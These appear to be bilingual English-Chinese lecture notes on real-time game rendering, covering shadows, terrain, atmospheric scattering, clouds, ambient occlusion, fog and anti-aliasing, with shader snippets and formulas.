    &=\int_{H{2}}k_{d}f_{Lambert}L_{i}(\boldsymbol{x},\omega_{i})\cos\theta_{i}d\omega_{i}+\int_{H{2}}f_{CookTorrances}L_{i}(\boldsymbol{x},\omega_{i})\cos\theta_{i}d\omega_{i} \
    &=L_d(x,\omega_o)+L_s(x,\omega_o)
    \end{aligned}$$

    Diffuse Irraiance Map

    • Irraiance Map

    webp

    Specular Approximation

    webp

    Approximation: part (1/2)

    webp

    Approximation: part (2/2)

    webp

    Quick Shading with Precomputation

    ​通过预计算进行快速着色

    webp

    Shading PBR with IBL

    ​加入环境贴图后,效果更加真实。

    webp

    Classic Shadow Solution

    Big World and Cascade Shadow

    webp

    • Partition the frustum into multiple frustums

      将视锥体划分为多个视锥体

    • A shadow map is rendered for each sub frustum

      为每个子视锥体渲染阴影贴图

    • The pixel shader then samples from the map that most closely matches the required resolution

      像素着色器然后从与所需分辨率最匹配的贴图中进行采样

    Steps of Cascade Shadow

    ​层叠影阶

    ​Cascade Shadow Mapping(级联阴影映射)是一种用于实时渲染中实现高质量阴影的技术。它被广泛应用于游戏引擎和其他实时渲染应用程序中,以提供更逼真的场景光照效果。

    ​Cascade Shadow Mapping 的基本思想是将场景中的光源视锥体(例如平行光源的视锥体)分成多个不同分辨率的子区域,每个子区域被称为一个级联(cascade)。然后,为每个级联计算一个独立的深度贴图(depth map),用于记录从光源视角下每个像素到场景中可见点的距离。

    ​通常,级联的数量和分辨率会根据距离光源的远近而动态调整,以确保远处的物体能够得到足够高的深度分辨率,从而减少阴影的锯齿状边缘(aliasing),同时避免过度消耗资源。通常情况下,近处级联具有更高的分辨率,而远处级联具有较低的分辨率。

    ​一旦每个级联的深度贴图都准备好了,就可以在渲染阴影的阶段使用它们。具体来说,对于每个要接受阴影的像素,都会根据其在世界空间中的位置和光源的视角来计算其在每个级联深度贴图中的深度值。然后,通过比较每个像素的深度值与相应级联深度贴图中的深度值,就可以确定像素是否在阴影中。

    webp

    splitFrustumToSubfrusta();
    calculateOrthoProjectionsForEachSubfrustum();
    renderShadowMapForEachSubfrustum();
    renderScene();

    vs_main() {
    calculateWorldPosition()
    }

    ps_main() {
    transformWorldPositionsForEachProjections()
    sampleAllShadowMaps()
    compareDepthAndLightingPixel()
    ...
    }

    Blend between Cascade Layers

    ​级联层之间的混合

    webp

    1. A visible seam can be seen where cascades overlap

      级联重叠处可以看到明显的接缝

    2. between cascade layers because the resolution does not match

      级联层之间因为分辨率不匹配

    3. The shader then linearly interpolates between the two values based on the pixel’s location in the blend band

      然后,着色器根据像素在混合带中的位置在两个值之间进行线性插值

    Pros and Cons of Cascade Shadow

    • Pros

      • best way to prevalent errors with shadowing: perspective aliasing

        解决阴影常见错误的最佳方法:透视锯齿

      • fast to generate depth map, 3x up when depth writing only

        快速生成深度图,仅深度写入时提高 3 倍

      • provide fairly good results

        提供相当好的结果

    • Cons

      • Nearly impossible to generate high quality area shadows

        几乎不可能生成高质量的区域阴影

      • No colored shadows. Translucent surfaces cast opaque shadows

        没有彩色阴影。半透明表面投射不透明阴影

    Hard Shadow vs Realistic Shadow

    webp

    PCF - Percentage Closer Filter

    ​PCF - 百分比接近过滤器

    ​PCF(Percentage Closer Filter)是一种用于改善阴影质量的技术,特别是在阴影映射中使用。它的目的是减少阴影边缘的锯齿(aliasing),使阴影更加柔和和逼真。

    ​阴影映射通常会生成一个深度贴图(depth map),用于记录从光源视角下到场景中各个点的距离。在渲染场景时,为了确定一个像素是否在阴影中,通常会比较场景中的点与光源的深度值。然而,简单地使用深度比较可能会导致锯齿状边缘,特别是在阴影投射到接近相机的表面上时。

    ​PCF 解决了这个问题。它通过对深度贴图中的深度值进行多次采样,并计算每次采样时像素与深度值的关系,以确定像素是否在阴影中。这些采样通常是在深度贴图的附近进行的,并且通常是在一个较小的范围内。这样,即使像素与阴影边缘接近,也能够准确地检测出阴影的存在,从而减少锯齿状边缘的问题。

    webp

    • Target problem

      目标问题

      • The shadows that result from shadow mapping aliasing is serious

        阴影贴图锯齿导致的阴影很严重

    • Basic idea

      基本思想

      • Sample from the shadow map around the current pixel and compare its depth to all the samples

        从当前像素周围的阴影贴图进行采样,并将其深度与所有样本进行比较

      • By averaging out the results we get a smoother line between light and shadow

        通过对结果进行平均,我们可以得到光影之间更平滑的线条

    PCSS - Percentage Closer Soft Shadow

    ​PCSS - 百分比接近软阴影

    ​Percentage Closer Soft Shadow(PCSS)是一种用于实时渲染中生成柔和阴影的技术。它是 Percentage Closer Filter(PCF)的一种变体,旨在在阴影边缘产生更加柔和和逼真的效果。

    ​PCSS 通过在每个像素处进行多个样本的深度比较,并根据深度比较结果和光源距离来计算阴影的柔和度。与传统的硬阴影相比,PCSS 考虑了阴影边缘周围的光线传播和遮挡,以模拟真实世界中光线的衍射和散射效应。

    PCSS 的实现通常包括以下步骤:

    1. 生成阴影贴图(Shadow Map): 首先,生成场景的深度贴图,用于记录从光源视角下到场景中各个点的距离。
    2. 多样本采样: 在渲染阶段,对于每个要接受阴影的像素,进行多个样本的深度比较。这些样本通常位于阴影边缘周围,并且可以通过多次采样来模拟光线的传播。
    3. 计算柔和阴影: 根据每个样本的深度比较结果以及光源与表面的距离,计算阴影的柔和度。通常,较远离光源的像素会产生较宽的阴影区域,而较接近光源的像素会产生较窄的阴影区域。
    4. 混合阴影: 将多个样本的阴影值进行加权平均,以获得最终的柔和阴影结果。这样可以使阴影边缘呈现出逐渐变化的过渡效果,减少锯齿状边缘。

    webp

    • Target problem

      目标问题

      • Suffers from aliasing and under sampling artifacts

        存在混叠和采样不足的问题

    • Basic idea

      基本思想

      • Search the shadow map and average the depths that are closer to the light source

        搜索阴影贴图并平均靠近光源的深度

      • Using a parallel planes approximation

        使用平行平面近似

    Variance Soft Shadow Map

    webp

    • Target problem

      目标问题

      • Rendering plausible soft shadow in real-time

        实时渲染合理的软阴影

    • Basic idea

      基本思想

      • Based on Chebyshev’s inequality, using the average and variance of depth, we can approximate the percentage of depth distribution directly instead of comparing a single depth to a particular region (PCSS)

        基于切比雪夫不等式,使用深度的平均值和方差,我们可以直接近似深度分布的百分比,而不是将单个深度与特定区域进行比较(PCSS)

    ​目前 3A 渲染广泛用到的技术:

    • Lightmap + Light probe
    • PBR + IBL
    • Cascade shadow + VSSM

    Moving Wave of High Quality

    Quick Evolving of GPU

    ​得益于 GPU 的发展,计算能力不断增强。

    • More flexible new shader model

      更灵活的新着色器模型

      • Compute shader

        计算着色器

      • Mesh shader

        网格着色器

      • Ray-tracing shader

        光线追踪着色器

    • High performance parallel architecture

      高性能并行架构

      • Warp or wave architecture

        扭曲或波浪结构

    • Fully opened graphics APl

      完全开放的图形 APl

      • DirectX 12 and Vulkan

        DirectX 12 和 Vulkan

    Real-Time Ray-Tracing on GPU

    webp

    ​新的 GPU 支持实时光线追踪。

    Real-Time Global lllumination

    webp

    More Complex Material Model

    webp

    Virtual Shadow Maps

    webp

    Shader Management

    Ocean of Shaders

    ​大游戏里用到的 Shader 非常多。

    Blow of Shaders

    ​要求在每帧中渲染场景中的多个 shader。

    Artist Create infinite More Shaders

    ​艺术家创造无限更多的着色器

    Uber Shader and Variants

    ​Uber 着色器和变体

    A combination of shader for all possible light types, render passes and material types

    ​适用于所有可能的灯光类型、渲染通道和材质类型的着色器组合

    • Shared many state and codes

      共享许多状态和代码

    • Compile to many variant short shaders by pre-defined macro

      通过预定义宏编译为许多变体短着色器

    // sky light
    #if ENABLE SKY LIGHT
    #if MATERIAL TWOSIDED && LQ_TEXTURE_LIGHTMAP
    if(NoL == 0) {
    #endif

    #if MATERIAL_SHADINGMODEL_SINGLELAYERWATER
    ShadingModelContext.WaterDiffuseIndirectLuminance += SkyDiffuselighting;
    #endif

    Color += SkyDiffuselighting * half3(ResolvedView.SkylightColor.rgb) * ShadingModelContext.DiffuseColor * MaterialA0;
    #if MATERIAL_TWOSIDED && LQ_TEXTURE_LIGHTMAP
    }
    #endif
    #endif

    Shader Variants Example In Real Game

    ​真实游戏中的着色器变体示例

    webp

    ​一大堆。为了降低耦合性,每个 shader 都是单独存在的。

    Cross Platform Shader Compile

    webp

    ​写 shader 也演变出了一堆语言!

    第六节(上):游戏中地形大气和云的渲染

    ​MD 天书……

    Rendering on Game Engine

    The Challenges and Fun of Rendering the Beautiful Mother Nature

    ​渲染美丽大自然的挑战和乐趣

    Real-World Landscape

    webp

    • Huge geospatial scale

      巨大的地理空间尺度

    • Rich geomorphological

      地貌丰富

      • Vegetation

        植被

      • Rivers

        河流

      • Undulating peaks

        起伏的山峰

      • Alpine snow

        高山雪

    Too Complex for Rendering Using Traditional Mesh + Material

    ​使用传统网格 + 材质渲染过于复杂

    Environment Components in Games

    webp

    Simple Idea - Heightfield

    webp

    Height Map

    ​高度图

    Contour Map

    ​等高线图

    • Satellite image and google earth

      卫星图像和谷歌地球

    Expressive Heightfield Terrains

    ​富有表现力的高度场地形

    Render Terrain with Heightfield

    ​使用高度场渲染地形

    webp

    Adaptive Mesh Tessellation

    ​自适应网格细分

    webp

    ​fov 内的网格密集,外的不密集。

    Two Golden Rules of Optimization

    ​两条优化黄金法则

    webp

    View-dependent error bound

    ​视图相关的错误界限

    • Distance to camera and FoV

      到相机和 FoV 的距离

    • Error compare to ground truth (pre-computation)

      与真实情况相比的误差(预计算)

    Triangle-Based Subdivision

    ​基于三角形的细分

    webp

    Subdivision and T-Junctions

    ​T-Junctions(T 字连接)是在计算机图形学中用于描述三角形网格连接关系的术语。当两个或多个三角形共享一个边时,它们在连接点形成了 T 字型的结构。这种连接在三维网格模型的拓扑结构中相当常见。

    ​T-Junctions 通常出现在网格的边缘、拐角或交叉点附近。它们可能会出现在几何体的建模、网格编辑、或者在进行几何操作(如网格合并、分割、细分等)时。在渲染阶段,T-Junctions 可能会导致一些问题,尤其是在基于三角形的图形渲染中,因为它们可能会导致不正确的图形拓扑和渲染结果。

    webp

    Continuously partitioning triangles and their children based on the idea of binary trees

    ​基于二叉树的思想连续划分三角形及其子节点

    Triangle-Based Subdivision on GPU

    webp

    54 x 54km terrarin on GPU using Unity game engine

    ​根据 GPU 架构设计的算法。

    QuadTree-Based Subdivision

    ​基于四叉树的细分

    webp

    Pros

    • Easy to construct

      易于建造

    • Easy management of data under geospatial, including objects culling and data streaming

      轻松管理地理空间下的数据,包括对象剔除和数据流

    Cons

    • Mesh subdivision is not as flexible as triangle mesh

      网格细分不如三角形网格灵活

    • The grid level of the leaf nodes needs to be consistent

      叶子节点的网格层级需要一致

    webp

    Solving T-Junctions among Quad Grids

    ​求解四边形网格之间的 T 型连接点

    webp

    Terrain Rendering with Quad Grid

    ​使用四网格进行地形渲染

    Triangulated lrregular Network (TlN)

    ​不规则三角网络 (TlN)

    webp

    Density Variants in TlN

    ​TlN 中的密度变量

    webp

    Triangulated lrregular Network vs. Adpative Tessellation

    ​不规则三角网络与自适应曲面细分

    webp

    Pros

    • Easy in runtime rendeirng

      易于运行时渲染

    • Less triangls in certain terrain types

      某些地形类型中的三角形较少

    webp

    Cons

    • Requires certain pre-processing steps

      需要一定的预处理步骤

    • Poor reusability

      可重用性差

    GPU-Based Tessellation

    ​基于 GPU 的曲面细分

    webp

    Hardware Tesselation

    ​硬件曲面细分

    webp

    Hul-Shader Stage - transforms basis functions from base mesh to surface patches

    Hul-Shader Stage - 将基础函数从基础网格转换为表面补丁

    Tessellator Stage - produces a semi-regular tessellation pattern for each patch

    Tessellator Stage - 为每个补丁生成半规则的镶嵌图案

    Domain-Shader Stage - a programmable shader stage that calculates the vertex position that corresponds to each domain sample

    Domain-Shader Stage - 一个可编程着色器阶段,用于计算与每个域样本对应的顶点位置

    webp

    Mesh Shader Pipeline

    webp

    • Amplification Shader Stage - decides how many Mesh shader groups to run and passes data to those groups

      放大着色器阶段 - 决定运行多少个网格着色器组并将数据传递到这些组

    • Mesh Shader Stage - produces a semi-regulartessellation pattern for each patch, and outputscomprise vertices and primitives

      网格着色器阶段 - 为每个补丁生成半规则曲面细分图案,输出包含顶点和图元

    Real-Time Deformable Terrain

    webp

    ​在游戏运行时,地表模型会改变(如车压路上)

    Dig a Hole in Terrain

    webp

    ​给地表挖洞。

    Crazy ldea - Volumetric Representation

    ​疯狂的想法-体积表示

    webp

    In 3D computer graphics, a voxel represents a value on a regular grid in three-dimensional space. As pixels in a 2D bitmap, voxels themselves do not typically have their position (i.e. coordinates) explicitly encoded with their values

    ​在 3D 计算机图形学中,体素表示三维空间中规则网格上的值。作为 2D 位图中的像素,体素本身通常不会使用其值显式编码其位置(即坐标)

    Marching Cubes

    ​行进立方体

    webp

    MARCHING CUBES: A HIGH RESOLUTION 3D SURFACE CONSTRUCTION ALGORITHM', Computer Graphics, volume 21, Number 4, July 1987

    ​给模型作切片。

    Transition Cell Lookup Table

    ​过渡单元查找表

    webp

    webp

    Transvoxel Algorithm

    ​跨体素算法

    • Constructs the triangulation of transition cells to form a lookup table, and uses this lookup table to do the triangulation of LOD voxel cubes

      构造过渡单元的三角剖分以形成查找表,并使用该查找表进行 LOD 体素立方体的三角剖分

    Make AAA as Flexible as Minecraft??? :-)

    ​我的世界是一个自由度很高的游戏,目前 3A 大作很难对场景环境做出改变。

    Terrain Materials

    webp

    ​一个 Terrain 往往包含多种 Materials。

    Simple Texture Splatting

    ​简单的纹理喷溅

    webp

    float3 blend(float4 texturel,float al, float4 texture2, float a2) {
    return texturel.rgb * al + texture2.rgb * a2;
    }

    ​terrain 上的纹理从一个过渡到另一个时,如果简单地使用混合,则平滑但不自然。

    Advanced Texture Splatting

    webp

    float3 blend(float4 texture1, float height1, float4 texture2, float height2) {
    return height1 > height2 ? texture1.rgb : texture2.rgb;
    }

    ​根据高度图实现材质的过渡。

    Advanced Texture Splatting - Biased

    webp

    ​引入 Height Bias。

    float3 blend(float4 texture1, float height1, float4 texture2, float height2) {
    float depth = 0.2;
    float ma = max(texture1.a + height1, texture2.a + height2) - depth;
    float b1 = max(texture1.a + height1 - ma, 0);
    float b2 = max(texture2.a + height2 - ma, 0);
    return (texture1.rgb * b1 + texture2.rgb * b2) / (b1 + b2);
    }

    Sampling from Material Texture Array

    ​从材质纹理数组采样

    webp

    Parallax and Displacement Mapping

    ​视差和位移贴图

    webp

    Parallax Mapping: Due to the height of the surface, the eye sees point B instead of pointA. lt creates a sense of dimensionality.

    ​视差映射:由于表面的高度,眼睛看到的是 B 点而不是 A 点。它创造了一种维度感。

    Expensive Material Blending

    webp

    • Many Texturing - Low performance whenmultiple materials are sampled too many times

      许多纹理 - 对多种材质采样太多次时性能较低

    • Huge Splat Map - We only see a small set ofterrain, but we load splat maps for 100square kminto video memory

      巨大的 Splat 地图 - 我们只能看到一小部分地形,但我们将 100 平方公里的 Splat 地图加载到显存中

    Virtual Texture

    ​虚拟纹理(Virtual Texture)是一种用于实时图形渲染的技术,旨在解决在有限的显存中管理大量纹理数据的挑战。传统上,图形渲染中使用的纹理数据通常是预加载到显存中的,但这种方法在需要处理大规模纹理数据时会遇到限制,尤其是在高分辨率的场景中。

    ​虚拟纹理通过将纹理数据分割成较小的块,并根据视野和需求动态地加载和卸载这些块,以优化显存利用率并允许处理大规模纹理数据。虚拟纹理技术的核心思想是将纹理数据存储在较大的物理存储介质(如硬盘或固态硬盘)中,然后根据需要将其部分加载到显存中供渲染使用。

    webp

    • Build a virtual indexed texture to represent allblended terrain materials for whole scene

      构建虚拟索引纹理来表示整个场景的所有混合地形材质

    • Only load materials data of tiles based on view-depend LOD

      仅根据视图相关的 LOD 加载图块的材质数据

    • Pre-bake materials blending into tile and store them into physical textures

      预烘烤混合到瓷砖中的材料并将其存储到物理纹理中

    VT implementation, DirectStorage & DMA

    ​VT 实现、DirectStorage 和 DMA

    webp

    Floating-point Precision Error

    ​浮点精度误差

    webp

    ​计算中 float 的精度可能不够,导致很远的物体会出现波动。

    Camera-Relative Rendering

    webp

    • Translates objects by the negated world space camera position before any other geometric transformations affect them

      在任何其他几何变换影响对象之前,通过否定的世界空间相机位置来平移对象

    • It then sets the world space camera position to 0 and modifies all relevant matrices accordingly

      然后将世界空间相机位置设置为 0 并相应地修改所有相关矩阵

    Integration with other world elements (rocks, trees, grass)

    ​与其他世界元素(岩石、树木、草)的融合

    Tree Rendering

    webp

    ​近处树模型复杂,远处简单

    Decorator Rendering

    webp

    ​装饰渲染。近处复杂,远处简单

    Road and Decals Rendering

    ​道路和贴花渲染

    webp

    Terrain Editing in Game Engine、Procedure Terrain creation……

    第六节(下):游戏中地形大气和云的渲染

    Sky and Atmosphere

    How to “Paint” Everything in the Sky

    webp

    ​主要讲渲染天空和云。

    Atmosphere

    Analytic Atmosphere Appearance Modeling

    ​大气外观分析建模

    webp

    $$\begin{aligned}
    \mathbb{F}(\theta,\gamma)=& (1+Ae{\frac{B}{\cos\theta+0.01}})\cdot(C+De{E\gamma}+ \
    &+F\cos2\gamma+G\cdot\chi(H,\gamma)+I\cdot\cos{\frac{1}{2}}\theta)
    \end{aligned}$$

    $$L_{\lambda}=\mathbb{F}(\theta,\gamma)\cdot L_{M\lambda}$$

    用这么个方程就表示了整个大气外观!

    Pros

    • Calculation is simple and efficient

      计算简单高效

    Cons

    • Limited to ground view

      仅限地面视图

    • Atmosphere parameters can’t be changed freely

      气氛参数不能随意更改

    Participating Media

    ​参与媒体

    webp

    Volume filled with particles

    ​充满颗粒的体积

    Interact differently with light depending on its composition

    ​与光的相互作用不同,具体取决于其成分

    How Light Interacts with Participating Media Particles?

    ​光如何与参与的介质粒子相互作用?

    webp

    • Absorption

      吸收

    • Out-scattering

      外散射

    • Emission

      排放

    • In-scattering

      内散射

    Volume Rendering Equation (VRE)

    ​体绘制方程 (VRE)

    webp

    $$L(P,\omega)=\int_{x=0}^{d}T(x)[\sigma_{a}\cdot L_{e}(x,\omega)+\sigma_{s}\cdot L_{i}(x,\omega)]dx+T(M)L(M,\omega)$$

    $$T(x)=e{-\int_xP\sigma_t(s)ds}$$

    Transmittance: the net reduction factor from absorption and out-scattering

    ​透射率:吸收和外散射的净减少因子

    $$L_{i}(x,\omega)=\int_{S{2}}f_{p}(x,\omega,\omega{\prime})L(x,\omega{\prime})d\omega{\prime}$$

    The net increase factor from in-scattering

    ​内散射的净增加因子

    Real Physics in Atmosphere

    webp

    学习计算机图形学还要对气象学有所涉猎!

    Scattering Types

    ​散射类型

    webp

    • Rayleigh Scattering

      瑞利散射

      Scattering of light by particles that have a diameter much smaller than the wavelength of the radiation (eg. air molecules)

      直径远小于辐射波长的粒子(例如空气分子)对光进行散射

    • Mie scattering

      米氏散射

      Scattering of light by particles that have a diameter similar to or larger than the wavelength of the incident light (eg. aerosols)

      直径类似于或大于入射光波长的颗粒(例如气溶胶)对光进行散射

    Rayleigh Scattering

    ​瑞利散射

    webp

    • Certain directions receive more light than others front-back symmetry

      某些方向比其他方向接收更多的光线,前后对称

    • Shorter wavelengths (eg. blue) are scattered more strongly than longer wavelengths (eg.red)

      较短波长(例如蓝色)比较长波长(例如红色)散射更强烈

    webp

    Why Sky is Blue

    webp

    ​由于大气层的存在,折射出蓝色,直射出红色。

    Mie Scattering

    ​米氏散射

    webp

    • Scatter light of all wavelength nearly equally

      几乎均匀地散射所有波长的光

    • Exhibit a strong forward directivity

      表现出强烈的前向方向性

    Mie Scattering Equation

    webp

    Mie Scattering in Daily Life

    ​日常生活中的三重散射

    webp

    • Exhibit a strong forward directivity (halo effects around sun)

      表现出强烈的前向方向性(太阳周围的光晕效应)

    • Scatter light of all wavelength nearly equally (fog effects)

      几乎均匀地散射所有波长的光(雾效应)

    Variant Air Molecules Absorption

    ​不同的空气分子吸收

    webp

    • Ozone (O3)
      Absorb strongly at longer wavelengths to filter out the reds, oranges, yellows

      强烈吸收较长波长,滤除红色、橙色、黄色

    • Methane (CH4)

      Well-known for absorbing red light

      以吸收红光而闻名

    Single Scattering vs. Multi Scattering

    webp

    $$L_1=\int_A^BL_{P->A}ds$$

    webp

    $$L_{n+1}=\int_{A}{B}\int_{4\pi}L_{n}(p,v{\prime})\cdot S(\lambda,\theta,h)\cdot T(p\to A)dv^{\prime}ds$$

    webp

    Ray Marching

    • Ray marching is a popular method to integrate function along a path

      射线行进是一种沿路径集成功能的流行方法

    • We use ray marching to calculate final radiance for a given point by single scattering

      我们使用光线行进通过单次散射计算给定点的最终辐射率

    • The integrated radiance is usually stored in look-up tables (LUT)

      综合辐射率通常存储在**查找表(LUT)**中

    webp

    Precomputed Atmospheric Scattering

    ​预先计算的大气散射

    webp

    webp

    webp

    Challenges of Precomputed Atmospheric Scattering

    ​预计算大气散射的挑战

    • Precomputation Cost

      预计算成本

      • Multi-scattering iterations are very expensive

        多次散射迭代非常昂贵

      • Hard to generate atmosphere LUT on low-end devices (ie. mobile)

        难以在低端设备(即移动设备)上生成氛围 LUT

    • Authoring and Dynamic Adjustment of Environments

      环境的创作和动态调整

      • Artist can’t change scattering coefficients on the fly

        艺术家无法即时更改散射系数

      • Hard to render effects like weather from sunny to rain fog, space travel among planets

        难以渲染天气从晴朗到雨雾、行星间太空旅行等效果

    • Runtime Rendering Cost

      运行时渲染成本

      • Expensive per-pixel multi high dimensional texture sampling for transmittance LUT and multi scattering LUT (always need to down-sample for efficiency)

        昂贵的每像素多高维纹理采样,用于透射 LUT 和多散射 LUT(始终需要下采样以提高效率)

    Production Friendly Quick Sky and Atmosphere Rendering

    ​制作友好的快速天空和大气渲染

    webp

    webp

    $$\begin{aligned}&G_{n+1}=G_{n}*f_{ms}\&\mathbf{F_{ms}}=1+\mathbf{f_{ms}}+\mathbf{f_{ms}{2}}+\mathbf{f_{ms}{3}}+…=\frac{1}{1-\mathbf{f_{ms}}}\&\Psi_{\mathbf{ms}}=\mathbf{L_{2^{nd}order}}\mathbf{F_{ms}}\end{aligned}$$

    Simplify Multi-scattering Assumption

    ​简化多重散射假设

    • Scattering events with order greater or equal to 2 are executed using an isotropic phase function

      使用各向同性相位函数执行阶数大于或等于 2 的散射事件

    • All points within the neighborhood of the position wecurrently shade receive the same amount of second order scattered light

      当前阴影位置附近的所有点接收相同量的二阶散射光

    • Visibility is ignored

      忽略可见性

    webp

    Fixed view position and sun position to remove 2 dimensions out of LUT

    ​固定视图位置和太阳位置以从 LUT 中删除 2 个维度

    webp

    • Generated a 3D LUT to evaluate aerial-perspective effects by ray marching

      生成 3D LUT 以通过光线行进评估空气透视效果

    Good Balance of Performance and Effect

    ​性能与效果的良好平衡

    webp

    “Paint” Cloud

    Cloud Type

    webp

    ​云被分成了这么多种。

    Mesh-Based Cloud Modeling

    ​基于网格的云建模

    webp

    Pros

    • High quality

      高质量

    Cons

    • Overall expensive

      代价高

    • Do not support dynamic weather

      不支持动态天气

    Billboard Cloud

    webp

    ​早期游戏使用贴图描述云。

    Pros

    • Efficient

      高效的

    Cons

    • Limited visual effect

      视觉效果有限

    • Limited cloud type

      有限的云类型

    Volumetric Cloud Modeling

    ​体积云建模

    webp

    Pros

    • Realistic cloud shapes

      逼真的云形状

    • Large scale clouds possible

      可能出现大规模云

    • Dynamic weather supported

      支持动态天气

    • Dynamic volumetric lighting and shadowing

      动态体积照明和阴影

    Cons

    • Efficiency must be considered

      必须考虑效率

    Weather Texture

    webp

    Noise Functions

    webp

    Cloud Density Model

    webp

    Rednering Cloud by Ray Marching

    webp

    第七节:游戏中渲染管线、后处理和其他的一切

    Ambient Occlusion

    ​环境光遮蔽

    webp

    ​环境光遮蔽(Ambient Occlusion)是一种计算机图形学中的技术,用于模拟光线在环境中传播时,由于物体之间的遮挡而导致的阴影效果。它可以增强场景的真实感和细节,使得物体之间的联系更加紧密。

    ​简单来说,环境光遮蔽就是在渲染场景时,考虑物体表面在环境光照射下的遮挡情况,对每个像素点进行采样,并计算出该像素点受到的周围物体的影响程度,最终得到一张带有阴影效果的图像。

    • Approximation of attenuation of ambient light due to occlusion

      由于遮挡而导致的环境光衰减的近似值

    webp

    Precomputed AO

    Using ray tracing to compute the AO offline and store the result into texture, which is widely used in object modeling process

    ​利用光线追踪离线计算 AO 并将结果存储到纹理中,广泛应用于物体建模过程。(空间换时间)

    • Extra storage cost

      额外的存储费用

    • Only apply to static object

      仅适用于静态对象

    webp

    Screen Space Ambient Occlusion (SSAO)

    ​屏幕空间环境光遮挡(SSAO)

    webp

    webp

    • Generate $N$ random samples in a sphere around eachpixel $p$ in view space

      在视图空间中每个像素 $p$ 周围的球体中生成 $N$ 个随机样本

    • Test sample occlusions by comparing depth against depth buffer

      通过将深度与深度缓冲区进行比较来测试样本遮挡

    • Average visibility of sample points to approximate AO

      采样点的平均可见度以近似 AO

    SSAO+

    webp

    • Recall the AO equation is acutally done on the normal-oriented hemisphere

      回想一下 AO 方程实际上是在法向半球上完成的

    ​于是对 SSAO 进行改进,只在半球上采样。

    webp

    ​效果看上去更好了,但是还有些问题,比如水泥墩子后面有不合理的阴影。

    HBAO-Horizon-based Ambient Occlusion

    ​HBAO-基于水平线的环境光遮挡

    webp

    • Use the depth buffer as a heightfield on 2D surface

      使用深度缓冲区作为 2D 表面上的高度场

    • Rays that below the horizon angle are occluded

      低于水平角的光线被遮挡

    HBAO lmplementation

    ​HBAO 实施

    webp

    • Use the depth buffer as a heightfield on 2D surface

      使用深度缓冲区作为 2D 表面上的高度场

    • Trace rays directly in 2D and approximate AO from horizon angle

      直接在 2D 中追踪光线并从水平角近似 AO

    GTAO - Ground Truth-based Ambient Occlusion

    ​GTAO - 基于地面实况的环境光遮挡

    webp

    GTAO introduces the missing cosine factor, removes the attenuation function, and add a fast approximation of multi bounce

    ​GTAO 引入了缺失的余弦因子,去除了衰减函数,并添加了多次反射的快速近似

    Add multiple bounces by fitting a cubic polynomial per albedo

    ​通过拟合每个反照率的三次多项式来添加多次反射

    webp

    Ray-Tracing Ambient Occlusion

    ​光线追踪环境光遮挡

    webp

    • Casting rays from each screen pixel using RTT hardware

      使用 RTT 硬件从每个屏幕像素投射光线

      • 1spp(sample per-pixel) works well for far-field occlusion

        1spp(每像素样本)非常适合远场遮挡

      • With 2-4spp, can recover detailed occlusion in contact region

        使用 2-4spp,可以恢复接触区域的详细遮挡

    Fog Everything

    Depth Fog

    Linear fog: 线性雾

    • factor = (end-z)/(end-start)

    Exp fog: 指数雾

    • factor = exp(- density * z)

    Exp squared fog: 指数平方雾

    • factor = exp(-(density * z) ^ 2)

    webp

    Height Fog

    ​Height Fog(高度雾)是一种计算机图形学中的特效,可以模拟出真实世界中的大气层的效果。它通常被应用于游戏、电影等场景中,用于增强场景的逼真度和氛围感。

    ​在 Height Fog 中,雾的浓度与高度成正比。也就是说,离地面越远的区域,雾的浓度越大,从而形成了逐渐模糊、逐渐淡化的效果。同时,Height Fog 还可以调整雾的颜色、密度、高度等参数,以达到不同的视觉效果。

    ​Height Fog 主要用于模拟自然环境中的大气层效果,例如山区、森林、海洋等场景。通过 Height Fog 的渲染,可以使得场景更加真实、自然,并且能够增强场景的情感和氛围感。

    webp

    • Height Fog integration along view diretion

      沿视图方向的高度雾集成

      $\mathrm{D(h)=D_{max}\cdot e^{-\sigma\cdot max(h-H_s,0)}}$

      FogDensitylntegration

      雾密度积分

      $=D_{max}\cdot d\int_{0}{1}e{-\sigma\cdot max((v_{z}+t*d_{z}-H_{s},0)}dt \=D_{max}\cdot d\cdot e^{-\sigma\cdot max(v_{z}-Hs,0)\frac{1-e^{-\sigma\cdot d_{z}}}{\sigma\cdot d_{z}}}$

    • Fog color after transmission

      传输后的雾色

      $\text{Foglnscatter}=1-\exp^{-\text{FogDensitylntegration}}\\text{FinalColor}=\text{FogColor}\cdot\text{Foglnscatter}$

    Voxel-based Volumetric Fog

    ​Voxel-based Volumetric Fog(基于体素的体积雾)是一种计算机图形学中的高级渲染技术。它通过将场景划分成小立方体(体素),并对每个体素进行采样和计算,从而模拟出真实世界中的体积雾效果。

    webp

    Anti-aliasing

    ​反走样

    Reason of Aliasing

    webp

    • Aliasing is a series of rendering artifact which is caused by high-frequency signal vs. insufficient sampling of limited rendering resolutions

      走样是由高频信号与有限渲染分辨率的采样不足引起的一系列渲染伪影

    Anti-aliasing

    webp

    The general strategy of screen-based antialiasing schemes is using a sampling pattern to get more samples and then weight and sum samples to produce a pixel color

    ​基于屏幕的抗锯齿方案的一般策略是使用采样模式获取更多样本,然后对样本进行加权和求和以生成像素颜色

    Super-sample AA (SSAA) and Multi-sample AA (MSAA)

    ​超样本 AA (SSAA) 和多样本 AA (MSAA)

    • Super sampling is the most straightforward solution to solve AA

      超采样是解决AA最直接的解决方案

    webp

    SSAA.4x rendering resolution

    ​SSAA.4x 渲染分辨率

    4x z-buffer and framebuffer

    ​4x z-缓冲区和帧缓冲区

    4x rasterization and pixel shading

    ​4x 光栅化和像素着色

    webp

    MSAA, only multi-sampling necessary pixels

    ​MSAA,仅多重采样必要的像素

    4x z-buffer and framebuffer

    ​4x z-缓冲区和帧缓冲区

    4x rasterization and 1+ x pixel shading

    ​4x 光栅化和 1+x 像素着色

    FXAA (Fast Approximate Anti-aliasing)

    ​FXAA(快速近似抗锯齿)

    webp

    M: Luminance of middle pixel
    (L = 0.299 * R + 0.587 * G + 0.114 * B)

    #define MinThreshold 0.05

    float MaxLuma = max(N, E,W, S, M);
    float MinLuma = min(N, E, W, S, M);
    float Contrast = MaxLuma - MinLuma;
    if(Contrast >= MinThreshold)
    ...

    Anti-aliasing based on 1x rendered image

    ​基于 1x 渲染图像的抗锯齿

    • Find edge pixels by luminance

      通过亮度查找边缘像素

    • Compute offset for every edge pixel

      计算每个边缘像素的偏移量

    • Re-sample edge pixel by its offset to blend with a neighbor

      通过偏移量重新采样边缘像素以与邻居混合

    Compute Offset Direction

    ​计算偏移方向

    webp

    Edge Searching Algorithm

    ​边缘搜索算法

    webp

    • Find aliasing edge that the pixel is in

      查找像素所在的锯齿边缘

